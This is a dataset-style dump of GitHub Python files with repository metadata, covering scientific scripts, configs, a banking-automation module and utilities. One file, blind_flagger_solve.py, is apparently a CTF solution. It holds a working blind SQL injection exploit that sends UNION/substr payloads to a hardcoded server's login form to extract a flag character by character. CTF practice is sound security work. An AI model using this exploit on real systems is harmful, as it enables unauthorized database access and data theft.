blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
94dc0ef50431d5665ad51b9387ffe5fc79253c51 | 553ab825f7d44def36c092d544a7bb6c9bc52881 | /Best_Maximum_Probability.py | c8c405c3f86b06122c3a1175939676817677a322 | [] | no_license | OzzyTao/TrajectorySmoothing | f8c898ed777dee860286f004200a1674753d538c | f1771fbe2c6719bcca56c4c6942ced6b375dcf30 | refs/heads/master | 2020-04-20T18:51:14.019699 | 2015-08-07T02:54:55 | 2015-08-07T02:54:55 | 40,339,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | from sta import Test
import pickle
import csv
# Location of the pickled experiment results; the last four metric names are
# the rank variants of the first four raw metrics.
path = 'f:/London/statistics/'
names = ['RMSE', 'TRMSE', 'area', 'CLength',
         'RMSE_Rank', 'TRMSE_Rank', 'area_Rank', 'CLength_Rank']
# K values
fields = ['30s', '40s', '50s', '60s', '90s', '120s', '150s']
seconds = [30, 40, 50, 60, 90, 120, 150]
suffix = 'econds101test.p'
binaryfiles = [field + suffix for field in fields[:-1]] + ['150seconds111test.p']

# Load one pickled test collection per sampling interval.
typetest = []
for filename in binaryfiles:
    with open(path + filename, 'rb') as binary:
        typetest.append(pickle.load(binary))

# For each of the four base metrics, write one CSV row per test holding the
# best rank and the corresponding probability.
for name in names[:4]:
    # NOTE(review): 'wb' with csv.writer is a Python 2 idiom; Python 3
    # requires text mode (newline='') here — confirm the target runtime.
    with open(path + 'best_rank/' + name + '_max.csv', 'wb') as csvfile:
        mywriter = csv.writer(csvfile, delimiter=',')
        mywriter.writerow(['seconds', 'rank', 'probability'])
        for second, tests in zip(seconds, typetest):
            for testid in range(100):
                best_rank = tests[testid].best_ranking(name)
                top_rank = tests[testid].best_ranking('possibility')
                mywriter.writerow((second, best_rank['possibility_Rank'],
                                   top_rank['possibility']))
| [
"ozzytao@Ozzys-MacBook-Pro.local"
] | ozzytao@Ozzys-MacBook-Pro.local |
53acf8afba1dca047ee2e925f727f123b6ae6295 | a94aee74f2c29e51d8740ac7ee336fcc4aeb408d | /2021/SecureBugCTF/blind_flagger_solve.py | b4872629b7e0b2eecf138f233f4facde4e6c0f0f | [] | no_license | CTF-STeam/ctf-writeups | c2103d66f315057f4eba527a2bc335248bf49c7f | 2f5532207db3d9f721d294bacaec6cd56c4ec752 | refs/heads/master | 2023-06-30T10:16:46.885305 | 2021-08-08T14:59:50 | 2021-08-08T14:59:50 | 290,140,012 | 5 | 4 | null | 2021-08-07T12:18:50 | 2020-08-25T07:03:45 | Python | UTF-8 | Python | false | false | 1,410 | py | import requests
BASE_URL = 'http://18.194.166.81:3334/old-login'
def tryUrl(param, pos):
    """Send one blind-SQLi probe; return True when the oracle fires.

    Server-side, the injected UNION query tests whether the character at
    1-based position ``pos + 1`` of flag.FlaggedFlag is >= ``param``
    (byte-wise, via a hex() comparison). The response contains b'did'
    exactly when that condition holds.
    """
    injection = (
        "' or 1=2 union select 1,FlaggedFlag from flag where hex(substr(FlaggedFlag,"
        + str(pos + 1)
        + ",1)) >= hex('"
        + param
        + "');--"
    )
    post_data = {'uname': 'admin', 'psw': injection}
    print(post_data)
    response = requests.post(BASE_URL, data=post_data, allow_redirects=False)
    return b'did' in response.content
def probeNextColChar(pos):
    """Binary-search the printable ASCII range for the flag char at ``pos``.

    Returns the recovered character, or False when no printable character
    matches (i.e. the position is past the end of the flag).
    """
    low, high = 32, 126
    while low < high:
        mid = low + (high - low) // 2
        candidate = chr(mid)
        if not tryUrl(candidate, pos):
            # Oracle says the flag character is strictly below the candidate.
            high = mid
            continue
        if low == mid:
            # Range collapsed to a single value: found it.
            return candidate
        low = mid
    return False
#nextChar = probeNextColChar(4)
#print(nextChar)
# Recover the flag one character at a time; probeNextColChar returns False
# once the position is past the end of the flag, which ends the loop.
flag = ''
pos = 0
while True:
    nextChar = probeNextColChar(pos)
    if not nextChar:
        break
    flag += nextChar
    pos += 1
    print("flag so far:", flag)
print(flag)
| [
"chinhnt2k3@gmail.com"
] | chinhnt2k3@gmail.com |
fe98cd8e2fe048a0813b442454d71bc1d015a7fc | acf7457d3a799cb9bff12686d2d616688bcd4b5b | /packages/python/plotly/plotly/validators/heatmap/legendgrouptitle/font/_color.py | 992adc73b123157b72fc2cd128fd797dbab38c2d | [
"MIT"
] | permissive | plotly/plotly.py | f4f61639f08160f16195efc95b5901dc5a937346 | 975a704074f01c078e0fdfa32bdf17130bf89e69 | refs/heads/master | 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 | MIT | 2023-09-08T19:55:32 | 2013-11-21T05:53:08 | Python | UTF-8 | Python | false | false | 427 | py | import _plotly_utils.basevalidators
class ColorValidator(_plotly_utils.basevalidators.ColorValidator):
    """Validator for the ``color`` property of heatmap.legendgrouptitle.font."""

    def __init__(
        self, plotly_name="color", parent_name="heatmap.legendgrouptitle.font", **kwargs
    ):
        # Default the edit type to "style" unless the caller overrides it.
        edit_type = kwargs.pop("edit_type", "style")
        super(ColorValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=edit_type,
            **kwargs,
        )
| [
"nicolas@plot.ly"
] | nicolas@plot.ly |
c71f56ec55e2469b4b7274175bf4d6fdd17517ea | 949633cd7f09a68b19304af14562b29514261ecc | /Validation/MuonGEMHits/python/SingleMuPt2-50Fwd_cfi.py | b7313215de37fa11c0b02cf416e409849712d915 | [] | permissive | gsfs/cmssw | eabfe97b0594287ce25556e6b091956b72baad72 | fdbcb59c16cafd2a9b56177064bc0b6b93cc51dc | refs/heads/CMSSW_8_0_X | 2021-01-21T23:41:29.108786 | 2019-04-11T16:11:14 | 2019-04-11T16:11:14 | 226,406,411 | 0 | 0 | Apache-2.0 | 2019-12-06T20:39:25 | 2019-12-06T20:39:24 | null | UTF-8 | Python | false | false | 526 | py | import FWCore.ParameterSet.Config as cms
# Particle gun: single anti-muons (PartID -13) with a flat pT spectrum
# between 2 and 50 GeV, over the full azimuth and |eta| <= 4.5.
generator = cms.EDProducer("FlatRandomPtGunProducer",
    PGunParameters = cms.PSet(
        MaxPt = cms.double(50.0),
        MinPt = cms.double(2.0),
        PartID = cms.vint32(-13),
        MinPhi = cms.double(-3.14159265359),
        MaxPhi = cms.double(3.14159265359),
        MinEta = cms.double(-4.5),
        MaxEta = cms.double(4.5)
    ),
    Verbosity = cms.untracked.int32(0),
    # NOTE(review): the label says "pt 40" but the gun spans pt 2-50 — confirm.
    psethack = cms.string('single mu pt 40 forward'),
    AddAntiParticle = cms.bool(True),
    firstRun = cms.untracked.uint32(1)
)
| [
"ry840901@gmail.com"
] | ry840901@gmail.com |
b104bc898e027c3443ab38096375afb2acb94686 | 9da8754002fa402ad8e6f25659978bd269bbcec8 | /src/25B/cdf_25B.py | 1a7bf3d9cd25f7a4eea1b9be350dfa6db25c93c0 | [
"MIT"
] | permissive | kopok2/CodeforcesSolutionsPython | a00f706dbf368ba0846c8ae86d4145b5dd3e1613 | 35bec0dbcff47765b123b5fe60476014376153df | refs/heads/master | 2023-02-02T03:08:22.097651 | 2020-12-17T22:00:50 | 2020-12-17T22:00:50 | 196,035,812 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | class CodeforcesTask25BSolution:
    def __init__(self):
        # Solver state: result holds the formatted answer, n the digit
        # count from the first input line, number the raw digit string.
        self.result = ''
        self.n = 0
        self.number = ''
    def read_input(self):
        """Read the digit count and the phone number string from stdin."""
        self.n = int(input())
        self.number = input()
def process_task(self):
result = []
if self.n % 2:
result.append(self.number[:3])
self.number = self.number[3:]
a = ""
for c in self.number:
if a:
result.append(a + c)
a = ""
else:
a = c
self.result = "-".join(result)
    def get_result(self):
        """Return the formatted phone number (groups joined by '-')."""
        return self.result
if __name__ == "__main__":
    # Standard competitive-programming driver: read stdin, solve, print.
    Solution = CodeforcesTask25BSolution()
    Solution.read_input()
    Solution.process_task()
    print(Solution.get_result())
| [
"oleszek.karol@gmail.com"
] | oleszek.karol@gmail.com |
8074f01904bff39c1ebfd7683a6d575784de2172 | e0fc7493f4339145792f54bcd7124acea500ca45 | /cpc/utils/ErrorHandler.py | a4971a3eda2ee541bbc19b681e53610fa2d843b3 | [
"BSD-3-Clause"
] | permissive | U-Ar/Cpresto | d52d99e8d44ed01c87c8911614d744cae695d6aa | f723458fb237c9e3e8bc8a6afdf7c81858a65363 | refs/heads/main | 2023-05-14T15:28:38.449783 | 2021-06-06T15:07:14 | 2021-06-06T15:07:14 | 364,445,894 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 937 | py | import sys
class ErrorHandler:
    """Collects errors and warnings for one compilation run and writes
    them, prefixed with the program id, to an output stream."""

    def __init__(self, progid, stream=None):
        # Default to stderr when no explicit stream is supplied.
        self.stream = sys.stderr if stream is None else stream
        self.program_id = progid
        self.n_error = 0
        self.n_warning = 0

    def error(self, msg, loc=None):
        """Report an error, optionally tagged with a source location."""
        prefix = self.program_id + ": error: "
        if loc is not None:
            prefix += loc.to_string() + ": "
        self.stream.write(prefix + msg + "\n")
        self.n_error += 1

    def warn(self, msg, loc=None):
        """Report a warning, optionally tagged with a source location."""
        prefix = self.program_id + ": warning: "
        if loc is not None:
            prefix += loc.to_string() + ": "
        self.stream.write(prefix + msg + "\n")
        self.n_warning += 1

    def error_occured(self):
        """Return True when at least one error has been reported."""
        return self.n_error > 0
"yuma.arakawa82128awakara.amuy@gmail.com"
] | yuma.arakawa82128awakara.amuy@gmail.com |
f7442f8c645cd183f3dec599c63d35e07280fb9a | d8e66e769e8f9b797d45ce3cfc01eb43d97eafad | /app/targetbalance.py | 0868084558cf89fd331bb9203be2e9f26f50583b | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | mvdwerve/bunq2ifttt | 34d2d76fa4c4049795237c0c2df855d70b1557c4 | de53ca03743b705c4f5149c756e0fd90d55231ee | refs/heads/master | 2022-11-29T06:20:58.048869 | 2020-08-02T16:34:38 | 2020-08-02T16:34:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,540 | py | """
Target balance
Handles the target balance internal/external actions
"""
import json
import uuid
from flask import request
import bunq
import payment
def target_balance_internal():
    """ Execute a target balance internal action

    Brings the balance of fields["account"] to fields["amount"] by moving
    money from/to fields["other_account"], using a direct payment or a
    draft payment depending on fields["payment_type"]. Returns a Flask
    (json, status) response tuple in IFTTT action format.
    """
    data = request.get_json()
    print("[target_balance_internal] input: {}".format(json.dumps(data)))
    if "actionFields" not in data:
        errmsg = "missing actionFields"
        print("[target_balance_internal] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    fields = data["actionFields"]
    errmsg = check_fields(True, fields)
    if errmsg:
        print("[target_balance_internal] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    # the account NL42BUNQ0123456789 is used for test payments
    if fields["account"] == "NL42BUNQ0123456789":
        return json.dumps({"data": [{"id": uuid.uuid4().hex}]})
    # retrieve balance
    config = bunq.retrieve_config()
    if fields["payment_type"] == "DIRECT":
        # For direct payments both balances are needed: a top-up can never
        # exceed the source (other) account's available balance.
        balance = get_balance(config, fields["account"],
                              fields["other_account"])
        if isinstance(balance, tuple):
            balance, balance2 = balance
            transfer_amount = fields["amount"] - balance
            if transfer_amount > balance2:
                transfer_amount = balance2
    else:
        balance = get_balance(config, fields["account"])
        if isinstance(balance, float):
            transfer_amount = fields["amount"] - balance
    # get_balance signals failure by returning an error string.
    if isinstance(balance, str):
        errmsg = balance
        print("[target_balance_internal] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    # construct payment message
    # NOTE(review): this tests the *target* amount, not transfer_amount;
    # check_fields already rejects amounts <= 0, so this branch looks
    # unreachable for sane input — confirm transfer_amount was intended.
    if "{:.2f}".format(fields["amount"]) == "0.00":
        errmsg = "No transfer needed, balance already ok"
        print("[target_balance_internal] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    if transfer_amount > 0 and "top up" in fields["direction"]:
        paymentmsg = {
            "amount": {
                "value": "{:.2f}".format(transfer_amount),
                "currency": "EUR"
            },
            "counterparty_alias": {
                "type": "IBAN",
                "value": fields["account"],
                "name": "x"
            },
            "description": fields["description"]
        }
        account = fields["other_account"]
    elif transfer_amount < 0 and "skim" in fields["direction"]:
        paymentmsg = {
            "amount": {
                "value": "{:.2f}".format(-transfer_amount),
                "currency": "EUR"
            },
            "counterparty_alias": {
                "type": "IBAN",
                "value": fields["other_account"],
                "name": "x"
            },
            "description": fields["description"]
        }
        account = fields["account"]
    else:
        # Covers transfer_amount == 0 and directions that exclude the
        # required transfer (e.g. skim-only but balance is below target).
        errmsg = "No transfer needed, balance already ok"
        print("[target_balance_internal] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    print(paymentmsg)
    # get id and check permissions
    if fields["payment_type"] == "DIRECT":
        accid, enabled = payment.check_source_account(True, False, config,
                                                      account)
    else:
        accid, enabled = payment.check_source_account(False, True, config,
                                                      account)
    if accid is None:
        errmsg = "unknown account: "+account
    # NOTE(review): when accid is None, enabled is typically False too, so
    # this message overwrites "unknown account" — confirm intended precedence.
    if not enabled:
        errmsg = "Payment type not enabled for account: "+account
    if errmsg:
        print("[target_balance_internal] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    # execute the payment
    if fields["payment_type"] == "DIRECT":
        result = bunq.post("v1/user/{}/monetary-account/{}/payment"
                           .format(config["user_id"], accid), paymentmsg)
    else:
        # Draft payments are wrapped in an envelope needing one accept.
        paymentmsg = {"number_of_required_accepts": 1, "entries": [paymentmsg]}
        result = bunq.post("v1/user/{}/monetary-account/{}/draft-payment"
                           .format(config["user_id"], accid), paymentmsg)
    print(result)
    if "Error" in result:
        return json.dumps({"errors": [{
            "status": "SKIP",
            "message": result["Error"][0]["error_description"]
        }]}), 400
    return json.dumps({"data": [{
        "id": str(result["Response"][0]["Id"]["id"])}]})
def target_balance_external():
    """ Execute a target balance external action

    Brings the balance of fields["account"] to fields["amount"] by either
    sending a payment request (top up, to an external email/phone/IBAN) or
    a draft payment (skim, to an external IBAN). Returns a Flask
    (json, status) response tuple in IFTTT action format.
    """
    data = request.get_json()
    print("[target_balance_external] input: {}".format(json.dumps(data)))
    if "actionFields" not in data:
        errmsg = "missing actionFields"
        print("[target_balance_external] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    fields = data["actionFields"]
    errmsg = check_fields(False, fields)
    if errmsg:
        print("[target_balance_external] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    # the account NL42BUNQ0123456789 is used for test payments
    if fields["account"] == "NL42BUNQ0123456789":
        return json.dumps({"data": [{"id": uuid.uuid4().hex}]})
    # retrieve balance
    config = bunq.retrieve_config()
    balance = get_balance(config, fields["account"])
    # get_balance signals failure by returning an error string.
    if isinstance(balance, str):
        errmsg = balance
        print("[target_balance_external] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    transfer_amount = fields["amount"] - balance
    # check for zero transfer
    # NOTE(review): this tests the *target* amount, not transfer_amount;
    # check_fields already rejects amounts <= 0, so this branch looks
    # unreachable for sane input — confirm transfer_amount was intended.
    if "{:.2f}".format(fields["amount"]) == "0.00":
        errmsg = "No transfer needed, balance already ok"
        print("[target_balance_external] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    # get account id and check permission
    if transfer_amount > 0:
        # Top up: look up the account id and the PaymentRequest permission.
        accid = None
        for acc in config["accounts"]:
            if acc["iban"] == fields["account"]:
                accid = acc["id"]
        enabled = False
        if "permissions" in config:
            if fields["account"] in config["permissions"]:
                if "PaymentRequest" in config["permissions"]\
                        [fields["account"]]:
                    enabled = config["permissions"][fields["account"]]\
                        ["PaymentRequest"]
    else:
        # Skim: draft payments need the draft-payment permission.
        accid, enabled = payment.check_source_account(False, True, config,
                                                      fields["account"])
    if accid is None:
        errmsg = "unknown account: "+fields["account"]
    # NOTE(review): when accid is None, enabled is also False, so this
    # message overwrites "unknown account" — confirm intended precedence.
    if not enabled:
        errmsg = "Not permitted for account: "+fields["account"]
    if errmsg:
        print("[target_balance_external] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    # send request / execute payment
    if transfer_amount > 0 and "top up" in fields["direction"]:
        # Classify the counterparty value as email, phone or IBAN.
        bmvalue = fields["request_phone_email_iban"].replace(" ", "")
        if "@" in bmvalue:
            bmtype = "EMAIL"
        elif bmvalue[:1] == "+" and bmvalue[1:].isdecimal():
            bmtype = "PHONE_NUMBER"
        elif bmvalue[:2].isalpha() and bmvalue[2:4].isdecimal():
            bmtype = "IBAN"
        else:
            errmsg = "Unrecognized as email, phone or iban: "+bmvalue
            print("[request_inquiry] ERROR: "+errmsg)
            return json.dumps({"errors": [{"status": "SKIP", "message":\
                errmsg}]}), 400
        msg = {
            "amount_inquired": {
                "value": "{:.2f}".format(transfer_amount),
                "currency": "EUR",
            },
            "counterparty_alias": {
                "type": bmtype,
                "name": bmvalue,
                "value": bmvalue
            },
            "description": fields["request_description"],
            "allow_bunqme": True,
        }
        print(json.dumps(msg))
        config = bunq.retrieve_config()
        result = bunq.post("v1/user/{}/monetary-account/{}/request-inquiry"\
            .format(config["user_id"], accid), msg, config)
    elif transfer_amount < 0 and "skim" in fields["direction"]:
        paymentmsg = {
            "amount": {
                "value": "{:.2f}".format(-transfer_amount),
                "currency": "EUR"
            },
            "counterparty_alias": {
                "type": "IBAN",
                "value": fields["payment_account"],
                "name": fields["payment_name"]
            },
            "description": fields["payment_description"]
        }
        print(paymentmsg)
        # Draft payments are wrapped in an envelope needing one accept.
        paymentmsg = {"number_of_required_accepts": 1, "entries": [paymentmsg]}
        result = bunq.post("v1/user/{}/monetary-account/{}/draft-payment"
                           .format(config["user_id"], accid), paymentmsg)
    else:
        errmsg = "No transfer needed, balance already ok"
        print("[target_balance_external] ERROR: "+errmsg)
        return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
            , 400
    print(result)
    if "Error" in result:
        return json.dumps({"errors": [{
            "status": "SKIP",
            "message": result["Error"][0]["error_description"]
        }]}), 400
    return json.dumps({"data": [{
        "id": str(result["Response"][0]["Id"]["id"])}]})
def check_fields(internal, fields):
    """Validate and normalize an action's fields dict in place.

    Strips spaces from IBAN fields and converts "amount" to float.
    Returns an error message string on failure, or None when valid.
    """
    required = (
        ["account", "amount", "other_account", "direction",
         "payment_type", "description"]
        if internal
        else ["account", "amount", "direction", "payment_account",
              "payment_name", "payment_description",
              "request_phone_email_iban", "request_description"]
    )
    for name in required:
        if name not in fields:
            return "missing field: " + name
    # Normalize IBANs: spaces are presentation-only.
    fields["account"] = fields["account"].replace(" ", "")
    if internal:
        fields["other_account"] = fields["other_account"].replace(" ", "")
    else:
        fields["payment_account"] = fields["payment_account"].replace(" ", "")
    # Amount must parse as a positive number; keep the raw value for the
    # error message.
    raw_amount = fields["amount"]
    try:
        fields["amount"] = float(raw_amount)
    except ValueError:
        fields["amount"] = -1
    if fields["amount"] <= 0:
        return "only positive amounts allowed: " + raw_amount
    return None
def get_balance(config, account, account2=None):
    """Return the balance of one account (float), or of two accounts as a
    tuple; on a missing account, return an error message string instead."""
    balances = bunq.retrieve_account_balances(config)
    if account not in balances:
        return "Account balance not found " + account
    if account2 is None:
        return balances[account]
    if account2 in balances:
        return balances[account], balances[account2]
    return "Account balance not found " + account2
| [
"edwin@woudt.nl"
] | edwin@woudt.nl |
5496783d37eedd3abd8679c0d29be881d4a588ee | 2cb7bad8855b56b4ea944ee54f6f82e7ff3adf74 | /project/janamat/wsgi.py | 3e976f6cadf3729b37aea1bbcc574aedada494b4 | [] | no_license | Swagoto97/MyBlog | eb41918276ce67c2feaba9d7e3e3749adfc45cc0 | c20f7da0f539f26d6fb55e1a301391ad8f3948a4 | refs/heads/master | 2023-06-29T00:06:00.295102 | 2021-07-26T11:20:57 | 2021-07-26T11:20:57 | 389,607,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | """
WSGI config for janamat project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the WSGI callable.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'janamat.settings')
# WSGI servers import this module-level callable to serve the project.
application = get_wsgi_application()
| [
"swagoto2sadhukhan@gmail.com"
] | swagoto2sadhukhan@gmail.com |
296423ec24b4780fed4d00720f1a842756b38435 | fc83aabda5c74f4a07c7003cf1257680400515f0 | /venv/Scripts/pip3-script.py | 871cdcbd9ede1f4f0ccd7aa4c5516098a0c4fa08 | [] | no_license | pirak3/Inklok | 473f3dd1df4f522f85e721c19d76b970585d56f4 | 01c0051fa1eae317e8abce4796206b6fa2d02f8e | refs/heads/master | 2020-03-10T18:07:33.261817 | 2018-04-14T13:10:27 | 2018-04-14T13:10:27 | 129,517,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | #!D:\Inklok\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3'
# Auto-generated setuptools wrapper that resolves and invokes the 'pip3'
# console entry point of the pinned pip distribution.
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point

if __name__ == '__main__':
    # Strip the "-script.py"/".exe" suffix so pip sees a clean program name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==9.0.1', 'console_scripts', 'pip3')()
    )
| [
"joepvanhulst10@gmail.com"
] | joepvanhulst10@gmail.com |
b15ceb94e2e8826bd4fc55a98f1ca8ab21c75907 | 170c3632b340871fb9f82ff1bde91b23f3700224 | /recommenders/hybrid_recommender.py | a655093669dc4ba0f9a732fac605db128f9c8400 | [] | no_license | predictory/predictory-api | 7c3d24aea677ed2674e8e1bb55ef055231878d6a | a7118cced3d941f7d2283f3945234346c15e1adb | refs/heads/master | 2021-06-18T05:58:53.493560 | 2019-11-07T08:58:31 | 2019-11-07T08:58:31 | 158,552,092 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | from models.weighted_hybrid_recommender import WeightedHybridRecommender
from models.switched_hybrid_recommender import SwitchedHybridRecommender
class HybridRecommender:
    """Dispatch facade that routes recommendation requests to either the
    weighted or the switched hybrid recommender and wraps the result in a
    response dict."""

    @staticmethod
    def get_recommendations(user_id, movie_id, hybrid_type='weighted', take=10, skip=0, genres=None, movie_type=None,
                            rec_type='svd', sim_type='cosine', sim_source='tf-idf',
                            order_by=None):
        """Return recommendations for (user_id, movie_id).

        ``order_by`` defaults to ['rating', 'similarity', 'es_score'].
        Fix: a None sentinel replaces the previous mutable default list,
        which was shared between calls and could be mutated downstream.
        """
        if order_by is None:
            order_by = ['rating', 'similarity', 'es_score']
        # Any hybrid_type other than the explicit 'switched' falls back to
        # the weighted strategy (original behaviour preserved).
        if hybrid_type == 'switched':
            recommendations = HybridRecommender.get_switched_recommendations(user_id, movie_id, take, skip, genres,
                                                                             movie_type, rec_type, sim_type, sim_source,
                                                                             order_by)
        else:
            recommendations = HybridRecommender.get_weighted_recommendations(user_id, movie_id, take, skip, genres,
                                                                             movie_type, rec_type, sim_type, sim_source,
                                                                             order_by)

        recommendations = {
            'userId': user_id,
            'movieId': movie_id,
            'recommendations': recommendations
        }

        return recommendations

    @staticmethod
    def get_weighted_recommendations(user_id, movie_id, take, skip, genres, movie_type, rec_type, sim_type, sim_source,
                                     order_by):
        """Delegate to the weighted hybrid recommender."""
        recommender = WeightedHybridRecommender()
        recommendations = recommender.get_recommendations(user_id, movie_id, take, skip, genres, movie_type, rec_type,
                                                          sim_type, sim_source, order_by)

        return recommendations

    @staticmethod
    def get_switched_recommendations(user_id, movie_id, take, skip, genres, movie_type, rec_type, sim_type, sim_source,
                                     order_by):
        """Delegate to the switched hybrid recommender."""
        recommender = SwitchedHybridRecommender()
        recommendations = recommender.get_recommendations(user_id, movie_id, take, skip, genres, movie_type, rec_type,
                                                          sim_type, sim_source, order_by)

        return recommendations
| [
"fojtik.v@gmail.com"
] | fojtik.v@gmail.com |
fad8543b40ac46027cd320c773ff3ad6eefd9be4 | a7f04883ebfc5d22172da939d72624a52c8632c1 | /post/migrations/0003_auto_20200326_0551.py | 7de2715a163b28c3d7cae586e2277079dc338141 | [] | no_license | almaaesh/ads | 2782b59ac65075e817634b3dea96050218b78932 | caf2df2c3e60c8475e90aa5457943283c73a3b10 | refs/heads/master | 2022-11-30T05:32:57.227143 | 2020-04-08T04:05:24 | 2020-04-08T04:05:24 | 253,975,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | # Generated by Django 2.1.2 on 2020-03-26 02:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0002_auto_20200326_0540'),
]
operations = [
migrations.AlterField(
model_name='product',
name='slug_ar',
field=models.SlugField(allow_unicode=True, blank=True, max_length=250, null=True, verbose_name='Slug Ar'),
),
]
| [
"BASSAM@Administrator.kfupm.edu.sa"
] | BASSAM@Administrator.kfupm.edu.sa |
a0ef8d57867120d76e7dd3c1b572137bdeb51bf6 | f7550c4964dc8f3c59dbcebe39e947bd6a264dba | /2.OOPS/Exception Handling.py | 05dac8b2c108980738fc273289f4f8795461eb72 | [] | no_license | Jashwanth-k/Data-Structures-and-Algorithms | db5e2e30932e0a35db578c19ae6cff9f147b7c3d | 1ebf9986999a474cb094f3ab04616a46f2887043 | refs/heads/main | 2023-08-25T02:57:17.394322 | 2021-10-11T15:27:56 | 2021-10-11T15:27:56 | 402,448,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | while True:
try:
n = int(input('enter the numerator :'))
num = int(n)
n = int(input('enter the denominator :'))
denom = int(n)
value = (num / denom)
print(value)
break
except ValueError:
print('Numerator and Denominator must be integers')
| [
"noreply@github.com"
] | Jashwanth-k.noreply@github.com |
9404e5e1138ec41fc2bad63449226d1cd0cc38c6 | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v4/services/domain_category_service_client_config.py | db4f358f4636c9982c5622eefbd7626ab8796369 | [
"Apache-2.0"
] | permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | false | 815 | py | config = {
    "interfaces": {
        "google.ads.googleads.v4.services.DomainCategoryService": {
            # Which gRPC status codes may be retried, per method class.
            "retry_codes": {
                "idempotent": [
                    "DEADLINE_EXCEEDED",
                    "UNAVAILABLE"
                ],
                "non_idempotent": []
            },
            # Exponential backoff / timeout parameters (milliseconds).
            "retry_params": {
                "default": {
                    "initial_retry_delay_millis": 5000,
                    "retry_delay_multiplier": 1.3,
                    "max_retry_delay_millis": 60000,
                    "initial_rpc_timeout_millis": 3600000,
                    "rpc_timeout_multiplier": 1.0,
                    "max_rpc_timeout_millis": 3600000,
                    "total_timeout_millis": 3600000
                }
            },
            # Per-RPC retry policy bindings.
            "methods": {
                "GetDomainCategory": {
                    "timeout_millis": 60000,
                    "retry_codes_name": "idempotent",
                    "retry_params_name": "default"
                }
            }
        }
    }
}
| [
"noreply@github.com"
] | fiboknacky.noreply@github.com |
479b17c3595be8900b8bb765f60ad7f41ff8a5ad | c09a78a4fc5e7c82291538f3437d50591903f45f | /python/tvm/relay/op/contrib/ethosu.py | 806bf6dce2e89814b248c5246797995b799a3af2 | [
"Apache-2.0",
"BSD-3-Clause",
"Zlib",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] | permissive | UofT-EcoSystem/tvm | 1dcdffb9069a003376bc54ad82640616956a80b6 | 6d6e0705873b0b64576127fd6038720ef6c9c338 | refs/heads/main | 2022-08-31T11:00:02.757303 | 2022-06-25T12:03:47 | 2022-06-25T12:03:47 | 393,457,696 | 0 | 1 | Apache-2.0 | 2021-08-06T17:51:12 | 2021-08-06T17:51:11 | null | UTF-8 | Python | false | false | 64,740 | py | # Licensed to the Apache Software Foundation (ASF) under one
